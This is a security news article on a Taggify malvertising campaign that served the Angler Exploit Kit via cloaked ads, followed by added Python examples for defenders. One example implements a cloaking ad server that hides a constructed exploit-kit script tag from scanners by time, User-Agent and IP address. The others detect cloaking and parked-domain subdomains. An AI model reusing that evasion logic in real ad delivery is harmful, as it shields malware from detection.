Ack! I’ve been poisoned

A rogue advertiser abused the Taggify self-serve ad platform to inject malware-installing code into browsers visiting the websites of two US TV stations.
It was a textbook malvertising attack: to infect victims' PCs, the dodgy ads pulled in the Angler Exploit Kit, a bundle of exploit code that targets weaknesses in Adobe Flash Player and in web browsers themselves to install spyware and other software nasties on the machine, with no click required from the user.

The ads were then served via the Taggify network to web surfers who visited domain registrar GoDaddy and the CBS-affiliated TV stations WBTV in Charlotte, North Carolina, and KMOV in St Louis.
Hacker-controlled servers hosted the malicious ad components – the JavaScript, images, Flash files and so on – alongside clean adverts used to camouflage the dodgy banners. Whether a given request got a bad or a good ad depended on several factors, including the time of day, the browser's User-Agent string, and the visitor's IP address.

This conditional serving, known as cloaking, is designed to make the attack harder to detect: anyone probing the ad at the wrong hour, from the wrong address, or with a browser that does not look like a real victim's sees only the clean creative.
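The following is an added example, not code from the article or from Malwarebytes' write-up. It models a cloaking ad server gated on the three factors the article names (hour of day, User-Agent, client IP) and a differential probe that fetches the same ad slot under several client profiles and flags the slot when the responses diverge. The IP ranges, User-Agent strings and ad payloads are all constructed for illustration; the probe takes any `fetch(profile) -> bytes` callable, so an HTTP client that sets the same headers can be dropped in against a real ad tag.

```python
"""Added example: a cloaking ad server and a differential probe that
detects it. Hostnames, IP ranges, UA strings and payloads are constructed;
none of this is the real Taggify or Angler infrastructure."""

import hashlib
import ipaddress
from dataclasses import dataclass

CLEAN_AD = b"<img src='https://ads.example/banner.png'>"                       # constructed decoy
MALICIOUS_AD = b"<script src='https://sub.parked-example.test/ek.js'></script>"  # constructed

# Constructed stand-in for the security-vendor / crawler ranges a real
# cloaker keeps so that scanners never receive the payload.
SCANNER_NETS = [ipaddress.ip_network("203.0.113.0/24"),
                ipaddress.ip_network("198.51.100.0/24")]

@dataclass(frozen=True)
class Client:
    ip: str
    user_agent: str
    hour: int   # local hour (0-23) at which the ad request arrives

def cloaked_ad_server(client: Client) -> bytes:
    """Pick the creative for one request. Each gate mirrors one of the
    factors the article lists: time of day, User-Agent, IP address."""
    # Attack only during daytime hours, when real victims are browsing
    # and the ad network's QA sweeps are assumed (constructed) to be idle.
    if not (8 <= client.hour < 20):
        return CLEAN_AD
    # Attack only what looks like a real desktop browser; headless or
    # bot-like agents get the decoy.
    ua = client.user_agent
    looks_like_browser = "Mozilla/5.0" in ua and "Windows NT" in ua
    if not looks_like_browser or "Headless" in ua or "bot" in ua.lower():
        return CLEAN_AD
    # Never attack addresses on the scanner list.
    addr = ipaddress.ip_address(client.ip)
    if any(addr in net for net in SCANNER_NETS):
        return CLEAN_AD
    return MALICIOUS_AD

def probe_for_cloaking(fetch, profiles) -> dict:
    """Fetch the same slot under every profile and group profiles by the
    hash of what came back. Two or more distinct responses for one slot
    is the cloaking signal; the profiles under each hash show which gate
    triggered."""
    by_hash = {}
    for profile in profiles:
        digest = hashlib.sha256(fetch(profile)).hexdigest()[:12]
        by_hash.setdefault(digest, []).append(profile)
    return by_hash

def is_cloaked(fetch, profiles) -> bool:
    return len(probe_for_cloaking(fetch, profiles)) > 1

DESKTOP_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/120.0 Safari/537.36")          # constructed
HEADLESS_UA = "Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/120.0"     # constructed

# Vary exactly one factor per probe so the diverging gate is attributable.
PROBE_PROFILES = [
    Client("192.0.2.10", DESKTOP_UA, 14),   # victim-like: daytime, desktop UA, ordinary IP
    Client("192.0.2.10", DESKTOP_UA, 3),    # same, but off-hours
    Client("192.0.2.10", HEADLESS_UA, 14),  # same, but headless browser
    Client("203.0.113.5", DESKTOP_UA, 14),  # same, but from a scanner range
]

if __name__ == "__main__":
    for digest, who in probe_for_cloaking(cloaked_ad_server, PROBE_PROFILES).items():
        print(digest, [(c.ip, c.hour, c.user_agent[:20]) for c in who])
```

When pointed at a live ad tag, run the probe from more than one network and at more than one time of day; a single vantage point sits in exactly the position the cloaker is built to fool.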
In this case, the domain used by the malvertisers was parked, meaning it was registered but served no content of its own, while one of its subdomains hosted the ads.

The malvertisers set up this arrangement by hijacking a GoDaddy DNS account, which gave them control of the parked domain's records and let them point the new subdomain at a server of their own.
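As an added example, not part of the article or of Malwarebytes' analysis, here is a triage heuristic for the infrastructure shape just described: an apex domain that resolves to a domain-parking range while one of its subdomains resolves to an unrelated host. Name resolution is injected so the check runs offline against a constructed lookup table; the parking ranges, hostnames and addresses are all constructed, and `apex_of` is a deliberately simple two-label split that a real deployment would replace with a public-suffix-aware library such as `tldextract`.

```python
"""Added example: flag 'parked apex, live subdomain' hostnames seen in ad
traffic. FAKE_DNS and PARKING_NETS are constructed; to run against live DNS
pass resolve=lambda n: socket.gethostbyname_ex(n)[2]."""

import ipaddress

# Constructed stand-in for a curated list of domain-parking hosting ranges.
PARKING_NETS = [ipaddress.ip_network("198.51.100.0/24")]

# Constructed resolution table standing in for live DNS answers.
FAKE_DNS = {
    "parked-example.test":     ["198.51.100.7"],   # apex parked at the registrar
    "cdn.parked-example.test": ["192.0.2.44"],     # subdomain -> unrelated host
    "example.test":            ["203.0.113.20"],   # ordinary site: apex and www share a host
    "www.example.test":        ["203.0.113.20"],
}

def fake_resolve(name: str) -> list:
    return FAKE_DNS.get(name, [])

def apex_of(hostname: str) -> str:
    """Last two labels. Wrong for multi-label public suffixes such as
    co.uk; use tldextract or a public-suffix list on real data."""
    labels = hostname.rstrip(".").split(".")
    return ".".join(labels[-2:])

def is_parked(addrs) -> bool:
    """All answers fall inside a known parking range."""
    return bool(addrs) and all(
        any(ipaddress.ip_address(a) in net for net in PARKING_NETS) for a in addrs)

def suspicious_parked_subdomain(hostname: str, resolve=fake_resolve) -> bool:
    """True when the apex is parked but this subdomain resolves to a
    different, non-parking address: the shape a hijacked DNS account
    makes possible. Apex names and unresolvable names are never flagged."""
    apex = apex_of(hostname)
    if apex == hostname:
        return False
    apex_addrs, sub_addrs = resolve(apex), resolve(hostname)
    if not sub_addrs or not is_parked(apex_addrs):
        return False
    return not (set(sub_addrs) & set(apex_addrs)) and not is_parked(sub_addrs)

def triage(hostnames, resolve=fake_resolve) -> list:
    """Return the subset of hostnames worth a closer look."""
    return [h for h in hostnames if suspicious_parked_subdomain(h, resolve)]

if __name__ == "__main__":
    observed = ["cdn.parked-example.test", "www.example.test", "parked-example.test"]
    print(triage(observed))
```

A hit from this check is a lead, not a verdict: the next steps are the WHOIS and passive-DNS history of the subdomain, and a look at how recently the record appeared relative to the campaign.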
Malwarebytes is due to publish more details on the malvertising scam, unravelled by crack security researcher Jerome Segura, on its blog today. ®
